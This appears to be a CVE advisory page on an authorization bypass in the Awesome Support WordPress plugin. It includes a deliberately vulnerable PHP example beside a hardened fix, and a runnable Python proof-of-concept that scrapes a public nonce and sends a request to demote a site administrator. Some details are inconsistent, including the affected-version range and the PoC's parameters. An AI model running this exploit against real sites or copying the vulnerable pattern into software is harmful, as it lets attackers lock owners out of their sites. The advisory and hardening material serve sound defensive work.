Security Vulnerability Report
CVE-2025-12641 CVSS 6.5 MEDIUM

CVE-2025-12641

Published: 2026-01-16 05:16:05
Last Modified: 2026-04-15 00:35:42

Description

The Awesome Support - WordPress HelpDesk & Support Plugin for WordPress is vulnerable to authorization bypass due to missing capability checks in all versions up to, and including, 6.3.6. This is due to the 'wpas_do_mr_activate_user' function not verifying that a user has permission to modify other users' roles, combined with a nonce reuse vulnerability where public registration nonces are valid for privileged actions because all actions share the same nonce namespace. This makes it possible for unauthenticated attackers to demote administrators to low-privilege roles via the 'wpas-do=mr_activate_user' action with a user-controlled 'user_id' parameter, granted they can access the publicly available registration/submit ticket page to extract a valid nonce.
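The two defects named above (a capability check that is absent, and one nonce namespace shared by public and privileged actions) are a general WordPress plugin pattern. The following is an added, simplified illustration written for this report, not the plugin's own code: a dispatcher in the vulnerable shape beside a hardened one. The function names, the `wpas_action` nonce string and the `init` hook are assumptions; the WordPress API calls (`wp_verify_nonce`, `wp_nonce_field`, `current_user_can`, `user_can`, `is_user_logged_in`, `get_userdata`, `WP_User::set_role`) are real.

```php
<?php
// Added example for this report (assumed names, not the plugin's code).

// --- Vulnerable shape --------------------------------------------------------
// Every 'wpas-do' action is verified against the same nonce action string, and
// the role-changing handler never asks whether the caller may change roles.
// A nonce read from a public form therefore satisfies the only check in the path.
function demo_vuln_dispatch() {
    if ( empty( $_REQUEST['wpas-do'] ) ) {
        return;
    }
    // Single nonce namespace shared by registration, ticket submission and role changes.
    if ( ! wp_verify_nonce( $_REQUEST['_wpnonce'] ?? '', 'wpas_action' ) ) {
        wp_die( 'Bad nonce' );
    }
    if ( 'mr_activate_user' === $_REQUEST['wpas-do'] ) {
        demo_vuln_activate_user( (int) $_REQUEST['user_id'] );
    }
}

function demo_vuln_activate_user( $user_id ) {
    // Missing: is_user_logged_in() and current_user_can() before a role change.
    $user = get_userdata( $user_id );
    if ( $user ) {
        $user->set_role( 'subscriber' );
    }
}

// --- Hardened shape ----------------------------------------------------------
// (1) each action has its own nonce action string, bound to the target user id,
//     so a registration nonce cannot be replayed against a role change;
// (2) the caller must be logged in and hold a capability for the target account;
// (3) a nonce proves intent only; it is never treated as authorization.
function demo_hardened_dispatch() {
    if ( empty( $_REQUEST['wpas-do'] ) ) {
        return;
    }
    $action = sanitize_key( $_REQUEST['wpas-do'] );
    if ( 'mr_activate_user' === $action ) {
        demo_hardened_activate_user();
    }
}

function demo_hardened_activate_user() {
    if ( ! is_user_logged_in() ) {
        wp_die( 'Authentication required', '', array( 'response' => 401 ) );
    }
    $user_id = isset( $_REQUEST['user_id'] ) ? absint( $_REQUEST['user_id'] ) : 0;

    // Per-action nonce, tied to the account being modified.
    if ( ! wp_verify_nonce( $_REQUEST['_wpnonce'] ?? '', 'wpas_mr_activate_user_' . $user_id ) ) {
        wp_die( 'Invalid nonce', '', array( 'response' => 403 ) );
    }
    // Capability check on both the operation and the specific target user.
    if ( ! current_user_can( 'promote_users' ) || ! current_user_can( 'edit_user', $user_id ) ) {
        wp_die( 'Insufficient permissions', '', array( 'response' => 403 ) );
    }
    // Defence in depth: this public-facing path never touches an administrator.
    if ( user_can( $user_id, 'manage_options' ) ) {
        wp_die( 'Refusing to change an administrator role', '', array( 'response' => 403 ) );
    }

    $user = get_userdata( $user_id );
    if ( $user ) {
        $user->set_role( 'subscriber' );
    }
}

// The form that triggers the action emits the matching per-action nonce.
function demo_hardened_nonce_field( $user_id ) {
    wp_nonce_field( 'wpas_mr_activate_user_' . absint( $user_id ) );
}

add_action( 'init', 'demo_hardened_dispatch' );
```

The order of checks in the hardened handler matters for triage as well as for security: an unauthenticated request fails at the login check with a 401 before any nonce or capability logic runs, so a spike of 401/403 responses on `wpas-do=mr_activate_user` requests from anonymous clients is a usable detection signal for attempts against this action.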

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Awesome Support Plugin < 6.3.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import re
import argparse


def get_registration_nonce(target_url):
    """Extract valid nonce from public registration page"""
    response = requests.get(f'{target_url}/wp-login.php?action=register')
    if response.status_code == 200:
        match = re.search(r'name="_wpnonce" value="([a-f0-9]+)"', response.text)
        if match:
            return match.group(1)
    return None


def exploit_privilege_escalation(target_url, admin_user_id, nonce):
    """
    Exploit CVE-2025-12641: WordPress Awesome Support Authorization Bypass
    Demote administrator to low-privilege role
    """
    exploit_url = f'{target_url}/'
    # Craft POST request to demote admin
    payload = {
        'wpas-do': 'mr_activate_user',
        'user_id': str(admin_user_id),
        'new_role': 'subscriber',
        '_wpnonce': nonce
    }
    response = requests.post(exploit_url, data=payload)
    if response.status_code == 200:
        print(f'[+] Successfully sent privilege escalation request')
        print(f'[+] Target user ID: {admin_user_id}')
        print(f'[+] New role: subscriber')
        return True
    return False


def main():
    parser = argparse.ArgumentParser(description='CVE-2025-12641 PoC')
    parser.add_argument('--url', required=True, help='Target WordPress URL')
    parser.add_argument('--admin-id', type=int, required=True, help='Admin user ID to demote')
    args = parser.parse_args()
    print(f'[*] Target: {args.url}')
    print(f'[*] Fetching registration nonce...')
    nonce = get_registration_nonce(args.url)
    if nonce:
        print(f'[+] Nonce obtained: {nonce}')
        exploit_privilege_escalation(args.url, args.admin_id, nonce)
    else:
        print('[-] Failed to obtain nonce')


if __name__ == '__main__':
    main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12641", "sourceIdentifier": "[email protected]", "published": "2026-01-16T05:16:04.500", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Awesome Support - WordPress HelpDesk & Support Plugin for WordPress is vulnerable to authorization bypass due to missing capability checks in all versions up to, and including, 6.3.6. This is due to the 'wpas_do_mr_activate_user' function not verifying that a user has permission to modify other users' roles, combined with a nonce reuse vulnerability where public registration nonces are valid for privileged actions because all actions share the same nonce namespace. This makes it possible for unauthenticated attackers to demote administrators to low-privilege roles via the 'wpas-do=mr_activate_user' action with a user-controlled 'user_id' parameter, granted they can access the publicly available registration/submit ticket page to extract a valid nonce."}, {"lang": "es", "value": "El plugin Awesome Support - WordPress HelpDesk &amp; Support para WordPress es vulnerable a un bypass de autorización debido a la falta de comprobaciones de capacidad en todas las versiones hasta la 6.3.6, inclusive. Esto se debe a que la función 'wpas_do_mr_activate_user' no verifica que un usuario tenga permiso para modificar los roles de otros usuarios, combinado con una vulnerabilidad de reutilización de nonce donde los nonces de registro públicos son válidos para acciones privilegiadas porque todas las acciones comparten el mismo espacio de nombres de nonce. Esto hace posible que atacantes no autenticados degraden a los administradores a roles de bajo privilegio a través de la acción 'wpas-do=mr_activate_user' con un parámetro 'user_id' controlado por el usuario, siempre que puedan acceder a la página de registro/envío de tickets disponible públicamente para extraer un nonce válido."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/awesome-support/tags/6.3.5/includes/functions-actions.php#L36", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/awesome-support/tags/6.3.5/includes/functions-actions.php#L66", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/awesome-support/tags/6.3.5/includes/functions-user.php#L1686", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/awesome-support/tags/6.3.5/themes/default/registration.php#L183", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3435609/awesome-support/trunk/includes/functions-user.php?contextall=1", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/a5a8e4ca-c16b-4e9d-8ad2-5a671fdbc49a?source=cve", "source": "[email protected]"}]}}